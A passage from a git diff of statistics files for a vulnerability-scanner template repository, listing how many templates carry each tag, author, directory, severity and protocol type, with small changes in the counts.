"count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7c93e4b0de..f99c983619 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,676 +1,643 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 533 | dhiyaneshdk | 232 | cves | 540 | info | 563 | http | 1624 | -| panel | 213 | pikpikcu | 219 | vulnerabilities | 249 | high | 436 | file | 43 | -| xss | 194 | pdteam | 189 | exposed-panels | 215 | medium | 363 | network | 35 | -| wordpress | 184 | dwisiswant0 | 126 | exposures | 170 | critical | 206 | dns | 11 | -| exposure | 178 | geeknik | 121 | technologies | 151 | low | 150 | | | -| rce | 177 | daffainfo | 108 | misconfiguration | 119 | | | | | -| lfi | 152 | madrobot | 60 | takeovers | 70 | | | | | -| cve2020 | 151 | princechaddha | 53 | default-logins | 49 | | | | | -| wp-plugin | 123 | gy741 | 50 | file | 43 | | | | | -| tech | 93 | gaurang | 42 | workflows | 34 | | | | | -| config | 90 | pussycat0x | 36 | network | 27 | | | | | -| cve2021 | 84 | ice3man | 26 | miscellaneous | 27 | | | | | -| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | | -| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | | -| cve2018 | 67 | philippedelteil | 15 | fuzzing | 10 | | | | | -| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| token | 64 | milo2012 | 14 | headless | 5 | | | | | +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | +| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | +| tech | 78 | organiccrap | 24 | iot | 22 | | | | | +| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | +| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | +| | 66 | milo2012 | 14 | cnvd | 9 | | | | | +| token | 63 | philippedelteil | 14 | headless | 5 | | | | | | apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | | default-login | 50 | techbrunchfr | 13 | | | | | | | -| cve2017 | 45 | suman_kar | 12 | | | | | | | -| iot | 44 | cyllective | 11 | | | | | | | -| file | 43 | random_robbie | 10 | | | | | | | -| unauth | 42 | wdahlenb | 9 | | | | | | | -| network | 35 | righettod | 9 | | | | | | | -| oob | 34 | nadino | 8 | | | | | | | -| sqli | 34 | melbadry9 | 8 | | | | | | | +| iot | 43 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | cyllective | 11 | | | | | | | +| file | 42 | random_robbie | 10 | | | | | | | +| unauth | 40 | righettod | 9 | | | | | | | +| network | 35 | wdahlenb | 9 | | | | | | | +| sqli | 34 | hackergautam | 8 | | | | | | | +| oob | 32 | nadino | 8 | | | | | | | | logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | hackergautam | 8 | | | | | | | -| workflow | 29 | that_juan_ | 8 | | | | | | | -| misc | 27 | iamthefrogy | 8 | | | | | | | -| ssrf | 27 | r3dg33k | 7 | | | | | | | -| jira | 26 | oppsec | 7 | | | | | | | -| atlassian | 26 | dr_set | 7 | | | | | | | -| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | -| cve2016 | 24 | 0x240x23elu | 7 | | | | | | | -| listing | 23 | emadshanab | 7 | | | | | | | -| redirect | 21 | randomstr1ng | 7 | | | | | | | -| aem | 19 | harshbothra_ | 7 | | | | | | | -| cisco | 18 | kophjager007 | 7 | | | | | | | -| sap | 16 | __fazal | 6 | | | | | | | -| cve2015 | 16 | caspergn | 6 | | | | | | | -| debug | 14 | puzzlepeaches | 6 | | | | | | | -| android | 13 | yanyun | 5 | | | | | | | -| misconfig | 13 | panch0r3d | 5 | | | | | | | -| cve2012 | 13 | ganofins | 5 | | | | | | | -| fuzz | 13 | pentest_swissky | 5 | | | | | | | -| struts | 13 | joanbono | 5 | | | | | | | +| oracle | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 29 | melbadry9 | 8 | | | | | | | +| ssrf | 27 | that_juan_ | 8 | | | | | | | +| misc | 27 | randomstr1ng | 7 | | | | | | | +| jira | 26 | dr_set | 7 | | | | | | | +| atlassian | 26 | emadshanab | 7 | | | | | | | +| disclosure | 25 | 0x240x23elu | 7 | | | | | | | +| cve2016 | 23 | oppsec | 7 | | | | | | | +| listing | 22 | harshbothra_ | 7 | | | | | | | +| redirect | 20 | techryptic (@tech) | 7 | | | | | | | +| aem | 19 | kophjager007 | 7 | | | | | | | +| cisco | 17 | r3dg33k | 7 | | | | | | | +| sap | 16 | puzzlepeaches | 6 | | | | | | | +| debug | 14 | caspergn | 6 | | | | | | | +| misconfig | 13 | __fazal | 6 | | | | | | | +| struts | 13 | yanyun | 5 | | | | | | | +| fuzz | 13 | joanbono | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| adobe | 12 | ganofins | 5 | | | | | | | +| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | | weblogic | 12 | meme-lord | 4 | | | | | | | -| auth-bypass | 12 | xelkomy | 4 | | | | | | | -| dns | 12 | nodauf | 4 | | | | | | | -| adobe | 12 | rootxharsh | 4 | | | | | | | -| cve2014 | 12 | iamnoooob | 4 | | | | | | | -| zoho | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 11 | elsfa7110 | 4 | | | | | | | -| springboot | 11 | e_schultze_ | 4 | | | | | | | -| jenkins | 11 | jarijaas | 3 | | | | | | | -| cve2013 | 10 | 0w4ys | 3 | | | | | | | -| php | 10 | shine | 3 | | | | | | | -| dlink | 10 | dudez | 3 | | | | | | | -| devops | 10 | yash anand @yashanand155 | 3 | | | | | | | -| magento | 9 | thomas_from_offensity | 3 | | | | | | | -| router | 9 | f1tz | 3 | | | | | | | -| airflow | 8 | fyoorer | 3 | | | | | | | -| aws | 8 | binaryfigments | 3 | | | 